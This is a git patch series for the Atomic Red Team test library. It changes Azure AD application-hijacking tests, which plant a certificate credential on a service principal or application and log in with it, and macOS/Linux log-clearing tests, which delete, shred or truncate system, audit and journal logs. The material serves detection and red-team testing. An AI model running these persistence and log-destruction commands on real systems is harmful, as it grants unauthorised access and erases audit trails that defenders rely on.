$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -62864,8 +62853,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -62889,14 +62877,6 @@ persistence: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. @@ -62920,21 +62900,18 @@ persistence: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -62947,8 +62924,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: AWS - Create Access Key and Secret Key diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md index b1150539..1eb42e11 100644 --- a/atomics/T1098.001/T1098.001.md +++ b/atomics/T1098.001/T1098.001.md @@ -42,8 +42,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini | username | Azure AD username | string | jonh@contoso.com| | password | Azure AD password | string | p4sswd| | service_principal_name | Name of the targeted service principal | string | SuperSP| -| certificate_password | Password of the new certificate | string | Passw0rd| -| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| #### Attack Commands: Run with `powershell`! @@ -59,21 +57,18 @@ $sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Se if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long -$certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) -$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint -Write-Host "Generated certificate ""$thumb""" -$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText -Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null +$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry -$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) +$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) +Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail -$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb +$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" ``` @@ -94,7 +89,6 @@ foreach ($cred in $credz) { } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore ``` @@ -136,8 +130,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini | username | Azure AD username | string | jonh@contoso.com| | password | Azure AD password | string | p4sswd| | application_name | Name of the targeted application | string | SuperApp| -| certificate_password | Password of the new certificate | string | Passw0rd| -| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| #### Attack Commands: Run with `powershell`! @@ -153,21 +145,18 @@ $app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Objec if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long -$certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) -$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint -Write-Host "Generated certificate ""$thumb""" -$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText -Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null +$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry -$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) +$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) +Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail -$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb +$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" ``` @@ -188,7 +177,6 @@ foreach ($cred in $credz) { } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore ``` From d8c164d3e6b3bcf24feb622feccc8edcfba538b8 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Sat, 10 Jun 2023 05:19:16 +0000 Subject: [PATCH 10/10] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 239 ++++++++++++++++++++++++++++--- atomics/Indexes/linux-index.yaml | 62 +++++++- atomics/Indexes/macos-index.yaml | 204 +++++++++++++++++++++++--- atomics/T1070.002/T1070.002.md | 235 +++++++++++++++++++++++++++--- 4 files changed, 682 insertions(+), 58 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b8224d2f..c1ff28fe 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -4580,10 +4580,33 @@ defense-evasion: supported_platforms: - macos - linux + input_arguments: + syslog_path: + description: path of syslog file to delete. On macos it's /var/log/system.log*, + on linux, it's /var/log/syslog*. Also note for File events, that on macos, + /var/ is a link to /private/var/. + type: string + default: "/var/log/system.log" + macos_audit_path: + description: path of audit file to delete + type: string + default: "/var/audit/20220725213300.202208110700021" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi + && stat #{syslog_path} + + ' + get_prereq_command: | + touch #{syslog_path} + if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi executor: command: | - sudo rm -rf /private/var/log/system.log* - sudo rm -rf /private/var/audit/* + sudo rm -rf #{syslog_path} + if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi name: sh elevation_required: true - name: Delete log files using built-in log utility @@ -4598,7 +4621,6 @@ defense-evasion: command: | sudo log erase --all sudo log erase --ttl #Deletes only time-to-live log content - sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log name: sh elevation_required: true - name: Truncate system log files via truncate utility @@ -4610,9 +4632,25 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path of system log to delete. + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo - truncate --size=0 /var/log/system.log #size parameter \n" + command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo + truncate --size=0 #{system_log_path} #size parameter \n" name: sh elevation_required: true - name: Delete log files via cat utility by appending /dev/null or /dev/zero @@ -4624,10 +4662,26 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path of system log to delete. + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: command: | - sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes - sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros) + sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes + sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros) name: sh elevation_required: true - name: System log file deletion via find utility @@ -4638,11 +4692,37 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_name1: + description: name or prefix of system log to delete. + type: string + default: system.log + system_log_name2: + description: name or prefix of system log to delete. + type: string + default: system.log.97.gz + system_log_name3: + description: name or prefix of system log to delete. + type: string + default: system.log.98.gz + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} + /var/log/#{system_log_name3} + + ' + get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} + /var/log/#{system_log_name3} + + ' executor: command: | - sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution - sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution - sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution + sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution + sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution + sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution name: sh elevation_required: true - name: Overwrite macOS system log via echo utility @@ -4653,8 +4733,13 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" executor: - command: 'sudo echo '''' > /var/log/system.log + command: 'sudo echo '''' > #{system_log_path} ' name: sh @@ -4680,8 +4765,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'sudo unlink /var/log/system.log + command: 'sudo unlink #{system_log_path} ' name: sh @@ -4694,8 +4795,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'sudo shred -u -z -n 3 /var/log/system.log + command: 'sudo shred -u -z -n 3 #{system_log_path} ' name: sh @@ -4708,10 +4825,31 @@ defense-evasion: Refer: https://github.com/khell/homebrew-srm/issues/1 for installation supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + system_log_folder: + description: path to log parent folder + type: string + default: "/var/log/" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} #{system_log_folder} + + ' + get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path} + #{system_log_folder}/system.log + + ' executor: command: | - sudo srm /var/log/system.log #system log file deletion - sudo srm -r /var/log/ #recursive deletion of log files + sudo srm #{system_log_path} #system log file deletion + sudo srm -r #{system_log_folder} #recursive deletion of log files name: sh elevation_required: true - name: Delete system log files using OSAScript @@ -4723,8 +4861,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator + command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator privileges'' ' @@ -4738,8 +4892,24 @@ defense-evasion: Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"'' + command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"'' ' name: sh @@ -4753,9 +4923,25 @@ defense-evasion: ' supported_platforms: - linux + input_arguments: + journal_folder: + description: path to journal logs + type: string + default: "/var/log/journal" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{journal_folder} + + ' + get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal + + ' executor: command: | - sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content + sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place name: sh elevation_required: true @@ -4773,7 +4959,19 @@ defense-evasion: description: Username of mail spool type: string default: root + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat /var/spool/mail/#{username} + + ' + get_prereq_command: 'touch /var/spool/mail/#{username} + + ' executor: + elevation_required: true command: 'echo 0> /var/spool/mail/#{username} ' @@ -4796,6 +4994,11 @@ defense-evasion: ' name: bash + elevation_required: true + cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} + ; fi + + ' T1218.004: technique: x_mitre_platforms: diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index d2498783..a9103054 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -3310,10 +3310,33 @@ defense-evasion: supported_platforms: - macos - linux + input_arguments: + syslog_path: + description: path of syslog file to delete. On macos it's /var/log/system.log*, + on linux, it's /var/log/syslog*. Also note for File events, that on macos, + /var/ is a link to /private/var/. + type: string + default: "/var/log/system.log" + macos_audit_path: + description: path of audit file to delete + type: string + default: "/var/audit/20220725213300.202208110700021" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi + && stat #{syslog_path} + + ' + get_prereq_command: | + touch #{syslog_path} + if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi executor: command: | - sudo rm -rf /private/var/log/system.log* - sudo rm -rf /private/var/audit/* + sudo rm -rf #{syslog_path} + if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi name: sh elevation_required: true - name: Delete system journal logs via rm and journalctl utilities @@ -3325,9 +3348,25 @@ defense-evasion: ' supported_platforms: - linux + input_arguments: + journal_folder: + description: path to journal logs + type: string + default: "/var/log/journal" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{journal_folder} + + ' + get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal + + ' executor: command: | - sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content + sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place name: sh elevation_required: true @@ -3345,7 +3384,19 @@ defense-evasion: description: Username of mail spool type: string default: root + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat /var/spool/mail/#{username} + + ' + get_prereq_command: 'touch /var/spool/mail/#{username} + + ' executor: + elevation_required: true command: 'echo 0> /var/spool/mail/#{username} ' @@ -3368,6 +3419,11 @@ defense-evasion: ' name: bash + elevation_required: true + cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} + ; fi + + ' T1218.004: technique: x_mitre_platforms: diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml index fa9e9661..2c80a7c9 100644 --- a/atomics/Indexes/macos-index.yaml +++ b/atomics/Indexes/macos-index.yaml @@ -3041,10 +3041,33 @@ defense-evasion: supported_platforms: - macos - linux + input_arguments: + syslog_path: + description: path of syslog file to delete. On macos it's /var/log/system.log*, + on linux, it's /var/log/syslog*. Also note for File events, that on macos, + /var/ is a link to /private/var/. + type: string + default: "/var/log/system.log" + macos_audit_path: + description: path of audit file to delete + type: string + default: "/var/audit/20220725213300.202208110700021" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi + && stat #{syslog_path} + + ' + get_prereq_command: | + touch #{syslog_path} + if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi executor: command: | - sudo rm -rf /private/var/log/system.log* - sudo rm -rf /private/var/audit/* + sudo rm -rf #{syslog_path} + if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi name: sh elevation_required: true - name: Delete log files using built-in log utility @@ -3059,7 +3082,6 @@ defense-evasion: command: | sudo log erase --all sudo log erase --ttl #Deletes only time-to-live log content - sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log name: sh elevation_required: true - name: Truncate system log files via truncate utility @@ -3071,9 +3093,25 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path of system log to delete. + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo - truncate --size=0 /var/log/system.log #size parameter \n" + command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo + truncate --size=0 #{system_log_path} #size parameter \n" name: sh elevation_required: true - name: Delete log files via cat utility by appending /dev/null or /dev/zero @@ -3085,10 +3123,26 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path of system log to delete. + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: command: | - sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes - sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros) + sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes + sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros) name: sh elevation_required: true - name: System log file deletion via find utility @@ -3099,11 +3153,37 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_name1: + description: name or prefix of system log to delete. + type: string + default: system.log + system_log_name2: + description: name or prefix of system log to delete. + type: string + default: system.log.97.gz + system_log_name3: + description: name or prefix of system log to delete. + type: string + default: system.log.98.gz + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} + /var/log/#{system_log_name3} + + ' + get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} + /var/log/#{system_log_name3} + + ' executor: command: | - sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution - sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution - sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution + sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution + sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution + sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution name: sh elevation_required: true - name: Overwrite macOS system log via echo utility @@ -3114,8 +3194,13 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" executor: - command: 'sudo echo '''' > /var/log/system.log + command: 'sudo echo '''' > #{system_log_path} ' name: sh @@ -3141,8 +3226,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'sudo unlink /var/log/system.log + command: 'sudo unlink #{system_log_path} ' name: sh @@ -3155,8 +3256,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'sudo shred -u -z -n 3 /var/log/system.log + command: 'sudo shred -u -z -n 3 #{system_log_path} ' name: sh @@ -3169,10 +3286,31 @@ defense-evasion: Refer: https://github.com/khell/homebrew-srm/issues/1 for installation supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + system_log_folder: + description: path to log parent folder + type: string + default: "/var/log/" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} #{system_log_folder} + + ' + get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path} + #{system_log_folder}/system.log + + ' executor: command: | - sudo srm /var/log/system.log #system log file deletion - sudo srm -r /var/log/ #recursive deletion of log files + sudo srm #{system_log_path} #system log file deletion + sudo srm -r #{system_log_folder} #recursive deletion of log files name: sh elevation_required: true - name: Delete system log files using OSAScript @@ -3184,8 +3322,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator + command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator privileges'' ' @@ -3199,8 +3353,24 @@ defense-evasion: Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"'' + command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"'' ' name: sh diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md index a78329a3..0f0d214d 100644 --- a/atomics/T1070.002/T1070.002.md +++ b/atomics/T1070.002/T1070.002.md @@ -58,18 +58,37 @@ Delete system and audit logs +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| syslog_path | path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. | string | /var/log/system.log| +| macos_audit_path | path of audit file to delete | string | /var/audit/20220725213300.202208110700021| + #### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh -sudo rm -rf /private/var/log/system.log* -sudo rm -rf /private/var/audit/* +sudo rm -rf #{syslog_path} +if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi ``` +#### Dependencies: Run with `sh`! +##### Description: target files must exist +##### Check Prereq Commands: +```sh +if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path} +``` +##### Get Prereq Commands: +```sh +touch #{syslog_path} +if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi +``` + +
